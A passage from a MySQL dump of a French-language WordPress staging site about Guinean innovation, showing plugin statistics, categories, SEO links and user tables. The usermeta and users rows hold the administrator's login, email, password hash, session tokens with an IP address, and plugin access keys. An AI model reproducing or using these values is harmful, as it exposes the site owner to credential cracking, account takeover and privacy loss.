12:37:26'),(666,100,1,0,1,'2017-11-21 13:07:10'),(667,100,8,0,0,'2017-11-21 13:07:11'),(668,100,1,0,1,'2017-11-21 13:16:07'),(669,100,8,0,0,'2017-11-21 13:16:14'),(670,100,1,0,1,'2017-11-21 13:40:43'),(671,100,1,0,1,'2017-11-21 14:10:08'),(672,100,8,0,0,'2017-11-21 14:10:09'),(673,100,1,0,1,'2017-11-21 14:25:31'),(674,100,8,0,0,'2017-11-21 14:25:37'),(675,100,1,0,1,'2017-11-21 15:00:39'),(676,100,1,0,1,'2017-11-21 16:35:13'),(677,100,8,0,0,'2017-11-21 16:35:21'),(678,100,1,0,1,'2017-11-21 19:27:31'),(679,100,8,0,0,'2017-11-21 19:27:38'),(680,100,1,0,1,'2017-11-21 19:52:05'),(681,100,8,0,0,'2017-11-21 19:52:17'),(682,100,8,0,0,'2017-11-21 22:43:14'),(683,100,1,0,1,'2017-11-21 22:43:14'),(684,100,1,0,1,'2017-11-22 02:47:04'),(685,100,1,0,1,'2017-11-22 04:21:32'),(686,100,8,0,0,'2017-11-22 04:21:34'),(687,100,1,0,1,'2017-11-22 10:54:43'),(688,100,8,0,0,'2017-11-22 10:54:45'),(689,100,1,0,1,'2017-11-22 11:04:58'),(690,100,8,0,0,'2017-11-22 11:05:14'),(691,100,1,0,1,'2017-11-22 11:13:22'),(692,100,8,0,0,'2017-11-22 11:13:32'),(693,100,1,0,1,'2017-11-22 11:24:52'),(694,100,8,0,0,'2017-11-22 11:25:03'),(695,100,1,0,1,'2017-11-22 12:01:09'),(696,100,8,0,0,'2017-11-22 12:01:10'),(697,100,1,0,1,'2017-11-22 12:30:03'),(698,100,8,0,0,'2017-11-22 12:30:04'),(699,100,1,0,1,'2017-11-22 12:39:21'),(700,100,8,0,0,'2017-11-22 12:39:28'),(701,100,1,0,1,'2017-11-22 13:02:10'),(702,100,8,0,0,'2017-11-22 13:02:37'),(703,100,1,0,1,'2017-11-22 14:09:14'),(704,100,8,0,0,'2017-11-22 14:09:21'),(705,100,1,0,1,'2017-11-22 17:51:57'),(706,100,8,0,0,'2017-11-22 17:53:24'),(707,100,1,0,1,'2017-11-22 18:58:53'),(708,100,8,0,0,'2017-11-22 18:58:56'),(709,100,1,0,1,'2017-11-22 19:04:28'),(710,100,8,0,0,'2017-11-22 19:04:33'),(711,100,1,0,1,'2017-11-22 19:26:03'),(712,100,8,0,0,'2017-11-22 19:26:10'),(713,100,1,0,1,'2017-11-22 19:32:25'),(714,100,8,0,0,'2017-11-22 19:32:26'),(715,100,1,0,1,'2017-11-22 20:05:27'),(716,100,8,0,0,'2017-11-22 20:06:01'),(717,100,1,0,1,'2017-11-22 21:01:02'),(718,100,8,0,0,'2017-11-22 21:01:45'),(719,100,1,0,1,'2017-11-22 21:18:21'),(720,100,1,0,1,'2017-11-22 22:26:42'),(721,100,1,0,1,'2017-11-22 23:39:20'),(722,100,8,0,0,'2017-11-22 23:39:35'),(723,100,1,0,1,'2017-11-23 01:54:38'),(724,100,8,0,0,'2017-11-23 01:54:39'),(725,100,1,0,1,'2017-11-23 06:16:58'),(726,100,8,0,0,'2017-11-23 06:17:03'),(727,100,1,0,1,'2017-11-23 07:43:43'),(728,100,1,0,1,'2017-11-23 08:30:41'),(729,100,8,0,0,'2017-11-23 08:30:42'),(730,100,1,0,1,'2017-11-23 09:31:28'),(731,100,1,0,1,'2017-11-23 10:12:33'),(732,100,8,0,0,'2017-11-23 10:12:33'),(733,100,1,0,1,'2017-11-23 10:39:07'),(734,100,8,0,0,'2017-11-23 10:39:08'),(735,100,1,0,1,'2017-11-23 11:00:33'),(736,100,8,0,0,'2017-11-23 11:01:44'),(737,100,1,0,1,'2017-11-23 11:15:55'),(738,100,8,0,0,'2017-11-23 11:16:22'),(739,100,1,0,1,'2017-11-23 11:29:24'),(740,100,8,0,0,'2017-11-23 11:29:25'),(741,100,1,0,1,'2017-11-23 11:49:44'),(742,100,1,0,1,'2017-11-23 14:41:14'),(743,100,8,0,0,'2017-11-23 14:41:24');
/*!40000 ALTER TABLE `wpstg0_pps_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_subscribers`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_subscribers` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(128) DEFAULT NULL,
  `email` varchar(128) NOT NULL,
  `hash` varchar(128) NOT NULL,
  `activated` tinyint(1) NOT NULL DEFAULT '0',
  `popup_id` int(11) NOT NULL DEFAULT '0',
  `date_created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `all_data` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_subscribers`
--

LOCK TABLES `wpstg0_pps_subscribers` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_subscribers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpstg0_pps_subscribers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_usage_stat`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_usage_stat` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(64) NOT NULL,
  `visits` int(11) NOT NULL DEFAULT '0',
  `spent_time` int(11) NOT NULL DEFAULT '0',
  `modify_timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_usage_stat`
--

LOCK TABLES `wpstg0_pps_usage_stat` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_usage_stat` DISABLE KEYS */;
INSERT INTO `wpstg0_pps_usage_stat` VALUES (5,'check_other_plugs_msg.show',1,0,'2017-11-09 10:36:27'),(6,'enb_promo_link_msg.show',1,0,'2017-11-23 15:45:56'),(7,'enb_stats_msg.show',1,0,'2017-11-23 15:45:56');
/*!40000 ALTER TABLE `wpstg0_pps_usage_stat` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_term_relationships`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_term_relationships`
--

LOCK TABLES `wpstg0_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpstg0_term_relationships` DISABLE KEYS */;
INSERT INTO `wpstg0_term_relationships` VALUES (357,11,0),(361,11,0),(362,11,0),(388,13,0),(389,13,0),(390,13,0),(391,13,0),(392,13,0),(393,13,0),(405,3,0),(411,3,0),(416,1,0),(536,13,0),(543,13,0),(558,13,0),(590,17,0),(603,4,0),(603,8,0),(607,13,0),(613,3,0),(619,3,0),(619,17,0),(626,3,0),(632,2,0),(638,2,0),(638,4,0),(662,3,0),(662,5,0),(670,3,0),(678,17,0),(681,6,0),(835,17,0),(839,3,0),(843,2,0),(846,3,0),(880,3,0),(880,17,0),(897,1,0),(909,2,0),(921,1,0),(930,4,0),(930,17,0);
/*!40000 ALTER TABLE `wpstg0_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_term_taxonomy`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_term_taxonomy`
--

LOCK TABLES `wpstg0_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpstg0_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpstg0_term_taxonomy` VALUES (1,1,'category','',0,3),(2,2,'category','',0,4),(3,3,'category','',0,9),(4,4,'category','',0,3),(5,5,'category','',0,1),(6,6,'category','',0,1),(8,8,'category','',0,1),(11,11,'elementor_library_type','',0,3),(12,12,'nav_menu','',0,0),(13,13,'nav_menu','',0,10),(14,14,'post_format','',0,0),(15,15,'post_format','',0,0),(16,16,'post_format','',0,0),(17,17,'category','',0,5);
/*!40000 ALTER TABLE `wpstg0_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_termmeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_termmeta`
--

LOCK TABLES `wpstg0_termmeta` WRITE;
/*!40000 ALTER TABLE `wpstg0_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpstg0_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_terms`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_terms`
--

LOCK TABLES `wpstg0_terms` WRITE;
/*!40000 ALTER TABLE `wpstg0_terms` DISABLE KEYS */;
INSERT INTO `wpstg0_terms` VALUES (1,'Autre','autre',0),(2,'Agriculture','agriculture',0),(3,'Technologie','technologie',0),(4,'Economie','economie',0),(5,'Santé','sante',0),(6,'Culture','culture',0),(8,'Sport','sport',0),(11,'page','page',0),(12,'menu','menu',0),(13,'Menu principal','menu-principal',0),(14,'Gallery','post-format-gallery',0),(15,'Video','video',0),(16,'Video','post-format-video',0),(17,'Société','societe',0);
/*!40000 ALTER TABLE `wpstg0_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_ts_locations`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_ts_locations` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `trip_id` int(11) NOT NULL,
  `latitude` double NOT NULL,
  `longitude` double NOT NULL,
  `altitude` double NOT NULL,
  `speed` double NOT NULL,
  `heading` double NOT NULL,
  `updated` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `created` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `occurred` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment` varchar(255) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `occurred` (`occurred`),
  KEY `trip_id` (`trip_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_ts_locations`
--

LOCK TABLES `wpstg0_ts_locations` WRITE;
/*!40000 ALTER TABLE `wpstg0_ts_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpstg0_ts_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_ts_tracks`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_ts_tracks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `updated` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `created` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `source` varchar(255) NOT NULL,
  `comment` varchar(255) NOT NULL,
  `distance` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_ts_tracks`
--

LOCK TABLES `wpstg0_ts_tracks` WRITE;
/*!40000 ALTER TABLE `wpstg0_ts_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpstg0_ts_tracks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_usermeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=35 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_usermeta`
--

LOCK TABLES `wpstg0_usermeta` WRITE;
/*!40000 ALTER TABLE `wpstg0_usermeta` DISABLE KEYS */;
INSERT INTO `wpstg0_usermeta` VALUES (1,1,'nickname','fmbangoura7'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'locale',''),(11,1,'wpstg0_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(12,1,'wpstg0_user_level','10'),(13,1,'dismissed_wp_pointers',''),(14,1,'show_welcome_panel','1'),(15,1,'session_tokens','a:5:{s:64:\"1e13ae03d46b6e37947951defbc741e98226f335bdb140698347ab28eab8480b\";a:4:{s:10:\"expiration\";i:1512740605;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:125:\"Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1\";s:5:\"login\";i:1511531005;}s:64:\"7f292f3fcb01c19a6719c2dbf74b4dea081c264b5eb2a5f1c92d15213fc02a27\";a:4:{s:10:\"expiration\";i:1513008259;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\";s:5:\"login\";i:1511798659;}s:64:\"d7d52a8397e71c4964e5f93899d9e82f27c28341df9c7472ab12b3a2f3a642ca\";a:4:{s:10:\"expiration\";i:1513184285;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:5:\"login\";i:1511974685;}s:64:\"3141c83aaa11dfbb99db4acc24e7b4683c8e29caf77a4445bb528c85c28241d4\";a:4:{s:10:\"expiration\";i:1513869920;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:5:\"login\";i:1512660320;}s:64:\"d09c4e29f287842376dbb2a0827f38fd5aaf7b61b4c5fa6b50d720b1e7aece4f\";a:4:{s:10:\"expiration\";i:1512896673;s:2:\"ip\";s:13:\"41.223.49.245\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:5:\"login\";i:1512723873;}}'),(16,1,'wpstg0_dashboard_quick_press_last_post_id','937'),(17,1,'community-events-location','a:1:{s:2:\"ip\";s:11:\"41.223.49.0\";}'),(18,1,'wpstg0_user-settings','libraryContent=browse&editor=tinymce&posts_list_mode=list'),(19,1,'wpstg0_user-settings-time','1509987958'),(20,1,'nav_menu_recently_edited','13'),(21,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(22,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),(23,1,'wpstg0_li_user_loves','a:1:{i:0;s:3:\"395\";}'),(24,1,'closedpostboxes_page','a:0:{}'),(25,1,'metaboxhidden_page','a:5:{i:0;s:10:\"postcustom\";i:1;s:16:\"commentstatusdiv\";i:2;s:11:\"commentsdiv\";i:3;s:7:\"slugdiv\";i:4;s:9:\"authordiv\";}'),(26,1,'wpstg0_yoast_notifications','a:3:{i:0;a:2:{s:7:\"message\";s:953:\"Nous avons remarqué que vous utilisez Yoast SEO depuis un certain temps ; nous espérons que vous l’adorez ! Nous serions très heureux si vous pouviez <a href=\"https://yoa.st/rate-yoast-seo?utm_content=5.7.1\">nous attribuer 5 étoiles sur WordPress.org</a> !\n\nSi vous rencontrez des problèmes, <a href=\"https://yoa.st/bugreport?utm_content=5.7.1\">veuillez remplir un rapport de bug</a> et nous ferons notre possible pour vous aider.\n\nAu fait, savez-vous que nous avons aussi une <a href=\'https://yoa.st/premium-notification?utm_content=5.7.1\'>extension Premium</a> ? Elle offre des fonctionnalités avancées, tel qu’un gestionnaire de redirection et la prise en charge des mots-clés multiples. Elle donne également accès à un support personnalisé 24/7.\n\n<a class=\"button\" href=\"https://guineeinnove.nimbasolution.com/1512723081474/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell\">Merci de ne plus m’afficher cette notification</a>\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:19:\"wpseo-upsell-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:1;a:2:{s:7:\"message\";s:221:\"Ne ratez pas vos erreurs d’exploration : <a href=\"https://guineeinnove.nimbasolution.com/1512723081474/wp-admin/admin.php?page=wpseo_search_console&tab=settings\">connectez-vous avec votre Google Search Console ici</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:17:\"wpseo-dismiss-gsc\";s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}i:2;a:2:{s:7:\"message\";s:387:\"Vous n’avez pas le nom de l’article dans l’URL de vos articles et pages. Il est fortement recommandé de l’avoir. Il est suggéré d’ajuster la structure de vos permaliens pour <strong>/%postname%/</strong>.<br/>Vous pouvez corriger cela sur la <a href=\"https://guineeinnove.nimbasolution.com/1512723081474/wp-admin/options-permalink.php\">page des réglages des permaliens</a>.\";s:7:\"options\";a:8:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:30:\"wpseo-dismiss-permalink-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";}}}'),(27,1,'manageedit-postcolumnshidden','a:4:{i:0;s:6:\"author\";i:1;s:11:\"wpseo-title\";i:2;s:14:\"wpseo-metadesc\";i:3;s:13:\"wpseo-focuskw\";}'),(28,1,'edit_post_per_page','20'),(29,1,'pps-tour-hst','a:1:{s:6:\"closed\";i:1;}'),(30,1,'ts_infobar_template','{displayname} - {lat},{lon} - {timestamp}'),(31,1,'ts_trackme_key','68f342de'),(32,1,'ts_osmand_key','a4dfb8fa'),(33,1,'ts_sendlocation_key','0ea9816c'),(34,1,'ts_tracks_admin_view','0');
/*!40000 ALTER TABLE `wpstg0_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_users`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_users`
--

LOCK TABLES `wpstg0_users` WRITE;
/*!40000 ALTER TABLE `wpstg0_users` DISABLE KEYS */;
INSERT INTO `wpstg0_users` VALUES (1,'fmbangoura7','$P$Bi01TXKk9QAzyFYDh50YKNYayrTnYd.','fmbangoura7','admin@guineeinnove.nimbasolution.com','','2017-10-23 13:48:44','',0,'fmbangoura7');
/*!40000 ALTER TABLE `wpstg0_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_yoast_seo_links`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`)
) ENGINE=InnoDB AUTO_INCREMENT=659 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_yoast_seo_links`
--

LOCK TABLES `wpstg0_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wpstg0_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `wpstg0_yoast_seo_links` VALUES (7,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg',416,0,'internal'),(8,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg',416,0,'internal'),(9,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg',416,0,'internal'),(10,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg',416,0,'internal'),(11,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg',416,0,'internal'),(12,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg',416,0,'internal'),(343,'http://agsp.ovh/',678,0,'external'),(345,'http://entrepreneurclub.orange.com/fr/entrepreneur-social-2017/projet/colismart.html',670,0,'external'),(389,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(390,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(391,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(392,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(393,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(394,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(395,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(396,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(397,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(398,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(399,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(400,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(401,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(402,'https://www.maxicoffee.com/cafe-c-6.html',638,0,'external'),(407,'https://play.google.com/store/apps/details?id=com.moudjames23.quiz224',626,0,'external'),(408,'http://www.porcedures-guinee.org/',619,0,'external'),(415,'http://Earthguinee.org',835,0,'external'),(417,'http://www.senditoo.com/',839,0,'external'),(529,'https://www.loniya.org/',613,0,'external'),(530,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/JAMES-PIERRE-Un-nouveau-Einstein-en-Afrique-Un-Guinéen-publie...via-torchbrowser.com_.mp4',897,0,'internal'),(543,'https://www.facebook.com/mamadoubhoye.bah.50',909,0,'external'),(544,'http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/',909,0,'external'),(545,'http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/',909,0,'external'),(651,'http://www.change-guinea.org/',930,0,'external'),(652,'http://www.budgetouvertgn.org',930,0,'external'),(653,'https://www.facebook.com/ibrahimakalil.gueye',930,0,'external'),(654,'https://www.facebook.com/ablogui/',930,0,'external'),(655,'https://www.facebook.com/AfriyanGuin%C3%A9e-2091165687576353/',930,0,'external'),(656,'https://www.facebook.com/agilinternationale.org/',930,0,'external'),(657,'https://www.facebook.com/La-Voix-Du-Peuple-Guin%C3%A9e-737636573077241/',930,0,'external'),(658,'https://www.facebook.com/groups/207880299670774/',930,0,'external');
/*!40000 ALTER TABLE `wpstg0_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_yoast_seo_meta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_yoast_seo_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT NULL,
  `incoming_link_count` int(10) unsigned DEFAULT NULL,
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_yoast_seo_meta`
--

LOCK TABLES `wpstg0_yoast_seo_meta` WRITE;
/*!40000 ALTER TABLE `wpstg0_yoast_seo_meta` DISABLE KEYS */;
